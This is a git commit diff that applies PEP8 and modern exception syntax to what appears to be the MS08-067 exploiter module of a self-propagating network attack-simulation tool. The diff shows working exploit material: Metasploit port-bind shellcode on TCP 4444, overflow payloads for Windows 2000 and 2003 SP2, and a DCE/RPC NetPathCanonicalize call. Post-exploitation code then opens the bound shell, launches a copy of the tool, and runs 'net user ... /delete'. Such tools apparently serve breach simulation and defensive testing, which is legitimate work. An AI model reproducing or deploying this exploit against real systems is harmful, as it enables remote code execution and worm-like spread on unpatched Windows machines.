If already touching this file, modify it for PEP8 + better exception syntax.
This commit is contained in:
parent
48ce135194
commit
a27c802b11
|
@ -9,34 +9,35 @@
|
|||
import sys
|
||||
import time
|
||||
import socket
|
||||
from enum import IntEnum
|
||||
from logging import getLogger
|
||||
from model.host import VictimHost
|
||||
from model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS
|
||||
from . import HostExploiter
|
||||
|
||||
from enum import IntEnum
|
||||
|
||||
from exploit.tools import SmbTools, get_target_monkey
|
||||
from network.tools import check_port_tcp
|
||||
from model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS
|
||||
from model.host import VictimHost
|
||||
from network import SMBFinger
|
||||
from network.tools import check_port_tcp
|
||||
from tools import build_monkey_commandline
|
||||
from . import HostExploiter
|
||||
|
||||
try:
|
||||
from impacket import smb
|
||||
from impacket import uuid
|
||||
#from impacket.dcerpc import dcerpc
|
||||
# from impacket.dcerpc import dcerpc
|
||||
from impacket.dcerpc.v5 import transport
|
||||
from impacket.smbconnection import SessionError as SessionError1
|
||||
from impacket.smb import SessionError as SessionError2
|
||||
from impacket.smb3 import SessionError as SessionError3
|
||||
except ImportError, exc:
|
||||
except ImportError as exc:
|
||||
print str(exc)
|
||||
print 'Install the following library to make this script work'
|
||||
print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'
|
||||
print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'
|
||||
sys.exit(1)
|
||||
|
||||
|
||||
LOG = getLogger(__name__)
|
||||
|
||||
|
||||
# Portbind shellcode from metasploit; Binds port to TCP port 4444
|
||||
SHELLCODE = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
||||
SHELLCODE += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9"
|
||||
|
@ -61,8 +62,7 @@ SHELLCODE += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8"
|
|||
SHELLCODE += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79"
|
||||
SHELLCODE += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6"
|
||||
SHELLCODE += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9"
|
||||
|
||||
|
||||
|
||||
# Payload for Windows 2000 target
|
||||
PAYLOAD_2000 = '\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00'
|
||||
PAYLOAD_2000 += '\x41\x41\x41\x41\x41\x41\x41\x41'
|
||||
|
@ -76,7 +76,7 @@ PAYLOAD_2000 += '\x43\x43\x43\x43\x43\x43\x43\x43'
|
|||
PAYLOAD_2000 += '\x43\x43\x43\x43\x43\x43\x43\x43'
|
||||
PAYLOAD_2000 += '\xeb\xcc'
|
||||
PAYLOAD_2000 += '\x00\x00'
|
||||
|
||||
|
||||
# Payload for Windows 2003[SP2] target
|
||||
PAYLOAD_2003 = '\x41\x00\x5c\x00'
|
||||
PAYLOAD_2003 += '\x2e\x00\x2e\x00\x5c\x00\x2e\x00'
|
||||
|
@ -95,11 +95,11 @@ PAYLOAD_2003 += '\xba\x77\xf9\x75\xbd\x77\x00\x00'
|
|||
class WindowsVersion(IntEnum):
|
||||
Windows2000 = 1
|
||||
Windows2003_SP2 = 2
|
||||
|
||||
|
||||
|
||||
|
||||
class SRVSVC_Exploit(object):
|
||||
TELNET_PORT = 4444
|
||||
|
||||
|
||||
def __init__(self, target_addr, os_version=WindowsVersion.Windows2003_SP2, port=445):
|
||||
self._port = port
|
||||
self._target = target_addr
|
||||
|
@ -110,33 +110,33 @@ class SRVSVC_Exploit(object):
|
|||
|
||||
The port on which the Telnet service will listen.
|
||||
"""
|
||||
|
||||
|
||||
return SRVSVC_Exploit.TELNET_PORT
|
||||
|
||||
|
||||
def start(self):
|
||||
"""start() -> socket
|
||||
|
||||
Exploit the target machine and return a socket connected to it's
|
||||
listening Telnet service.
|
||||
"""
|
||||
|
||||
|
||||
target_rpc_name = "ncacn_np:%s[\\pipe\\browser]" % self._target
|
||||
|
||||
|
||||
LOG.debug("Initiating exploit connection (%s)", target_rpc_name)
|
||||
self._trans = transport.DCERPCTransportFactory(target_rpc_name)
|
||||
self._trans.connect()
|
||||
|
||||
|
||||
LOG.debug("Connected to %s", target_rpc_name)
|
||||
|
||||
|
||||
self._dce = self._trans.DCERPC_class(self._trans)
|
||||
self._dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
|
||||
|
||||
|
||||
dce_packet = self._build_dce_packet()
|
||||
self._dce.call(0x1f, dce_packet) #0x1f (or 31)- NetPathCanonicalize Operation
|
||||
|
||||
self._dce.call(0x1f, dce_packet) # 0x1f (or 31)- NetPathCanonicalize Operation
|
||||
|
||||
LOG.debug("Exploit sent to %s successfully...", self._target)
|
||||
LOG.debug("Target machine should be listening over port %d now", self.get_telnet_port())
|
||||
|
||||
|
||||
sock = socket.socket()
|
||||
sock.connect((self._target, self.get_telnet_port()))
|
||||
return sock
|
||||
|
@ -162,7 +162,7 @@ class SRVSVC_Exploit(object):
|
|||
dce_packet += '\x00\x00\x00\x00\x02\x00\x00\x00'
|
||||
dce_packet += '\x5c\x00\x00\x00\x01\x00\x00\x00'
|
||||
dce_packet += '\x01\x00\x00\x00'
|
||||
|
||||
|
||||
return dce_packet
|
||||
|
||||
|
||||
|
@ -186,7 +186,7 @@ class Ms08_067_Exploiter(HostExploiter):
|
|||
smb_finger = SMBFinger()
|
||||
if smb_finger.get_host_fingerprint(host):
|
||||
return host.os.get('type') in self._target_os_type and \
|
||||
host.os.get('version') in self._windows_versions.keys()
|
||||
host.os.get('version') in self._windows_versions.keys()
|
||||
return False
|
||||
|
||||
def exploit_host(self, host, depth=-1, src_path=None):
|
||||
|
@ -218,7 +218,7 @@ class Ms08_067_Exploiter(HostExploiter):
|
|||
LOG.debug("Exploited into %r using MS08-067", host)
|
||||
exploited = True
|
||||
break
|
||||
except Exception, exc:
|
||||
except Exception as exc:
|
||||
LOG.debug("Error exploiting victim %r: (%s)", host, exc)
|
||||
continue
|
||||
|
||||
|
@ -256,15 +256,15 @@ class Ms08_067_Exploiter(HostExploiter):
|
|||
build_monkey_commandline(host, depth - 1)
|
||||
|
||||
try:
|
||||
sock.send("start %s\r\n" % (cmdline, ))
|
||||
sock.send("net user %s /delete\r\n" % (self._config.ms08_067_remote_user_add, ))
|
||||
except Exception, exc:
|
||||
sock.send("start %s\r\n" % (cmdline,))
|
||||
sock.send("net user %s /delete\r\n" % (self._config.ms08_067_remote_user_add,))
|
||||
except Exception as exc:
|
||||
LOG.debug("Error in post-debug phase while exploiting victim %r: (%s)", host, exc)
|
||||
return False
|
||||
finally:
|
||||
try:
|
||||
sock.close()
|
||||
except:
|
||||
except socket.error:
|
||||
pass
|
||||
|
||||
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
|
||||
|
|
Loading…
Reference in New Issue